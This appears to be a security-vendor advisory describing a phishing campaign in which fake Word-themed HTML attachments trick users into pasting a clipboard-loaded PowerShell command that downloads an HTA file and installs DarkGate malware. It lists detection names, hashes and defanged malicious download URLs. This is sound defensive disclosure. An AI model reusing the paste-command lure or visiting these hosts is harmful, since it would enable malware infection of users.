Beware of Phishing Emails Urging Command Execution through Paste (CTRL+V)

AhnLab SEcurity intelligence Center (ASEC) recently discovered that phishing files are being distributed via emails. The phishing files (HTML) attached to the emails prompt users to directly paste (CTRL+V) and run the commands.

Figure 1. Phishing emails

The threat actor sent emails about fee processing, operation instruction reviews, etc. to prompt recipients to open the attachments. When a user opens the HTML file, a background and a message disguised as MS Word appear. The message tells the user to click the “How to fix” button to view the Word document offline.

Figure 2. The messages prompting the user to enter the command

Upon clicking “How to fix”, the file prompts the user to enter [Win+R] → [CTRL+V] → [Enter], or open the PowerShell terminal and manually input the command. Simultaneously, the malicious PowerShell command (see Figure 4) that is Base64-encoded by the JavaScript (see Figure 3) is decoded and saved into the user’s clipboard.

Figure 3. Saving the malicious PowerShell command into the user’s clipboard
Figure 4. The Base64-encoded PowerShell command

After going through the process explained above, the malicious PowerShell script is executed (see Figure 5).

Figure 5. Executing the malicious PowerShell script already set in the clipboard

The PowerShell command downloads an HTA file from C2 and executes it. Additionally, it blanks out the clipboard, seemingly to obscure the PowerShell command that has been executed. HTA executes the PowerShell command in C2, and Autoit3.exe inside the ZIP file uses the compiled malicious Autoit script (script.a3x) as an argument to be executed. The overall operation flow from the reception of the email to the infection is shown in Figure 6.

Figure 6. Overall flow

Ultimately, the DarkGate malware that starts with Autoit infects the system. Users must take extra caution when handling files from unknown sources, especially the URLs and attachments of emails.

File Detection
Phishing/HTML.ClipBoard.SC199655 (2024.05.21.03)
Downloader/VBS.Generic.SC199642 (2024.05.21.00)
Downloader/VBS.Generic.SC199656 (2024.05.21.03)
Downloader/HTA.DarkGate.SC199621 (2024.05.16.02)
Downloader/PowerShell.Generic (2024.05.21.00)
Downloader/PowerShell.Generic (2024.05.21.02)
Downloader/PowerShell.Generic (2024.05.21.03)
Trojan/AU3.Agent (2024.05.21.00)
Trojan/AU3.Agent (2024.05.21.03)
Trojan/AU3.Agent (2024.05.22.00)

Behavior Detection
Execution/MDP.Powershell.M2514

IOCs
8b788345fe1a3e9070e2d2982c1f1eb2 (html)
a66cc0139c199b37a32731592fb3ac0b (header.png)
0b77babfa83bdb4443bb3c5f918545ae (qhsddxna)
404bd47f17d482e139e64d0106b8888d (script.a3x in xcdttafq)
4b653886093a209c3d86cb43d507a53f (html)
30e2442555a4224bf15bbffae5e184ee (dark.hta)
7484931957633b796f165061b0c59794 (rdyjyany)
e0173741b91cabfecd703c20241c1108 (script.a3x in yoomzhda)
318f00b609039588ce5ace3bf1f8d05f (html)
a77becccca5571c00ebc9e516fd96ce8 (1.hta)
f2e4351aa516a1f2e59ade5d9e7aa1d6 (umkglnks)
4d52ea9aa7cd3a0e820a9421d936073f (script.a3x in iinkqrwu)

Download URLs
hxxps://jenniferwelsh[.]com/header.png
hxxp://mylittlecabbage[.]net/qhsddxna
hxxp://mylittlecabbage[.]net/xcdttafq
hxxps://linktoxic34[.]com/wp-content/themes/twentytwentytwo/dark.hta
hxxp://dogmupdate[.]com/rdyjyany
hxxp://dogmupdate[.]com/yoomzhda
hxxps://www.rockcreekdds[.]com/wp-content/1.hta
hxxp://flexiblemaria[.]com/umkglnks
hxxp://flexiblemaria[.]com/iinkqrwu

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V) appeared first on ASEC BLOG.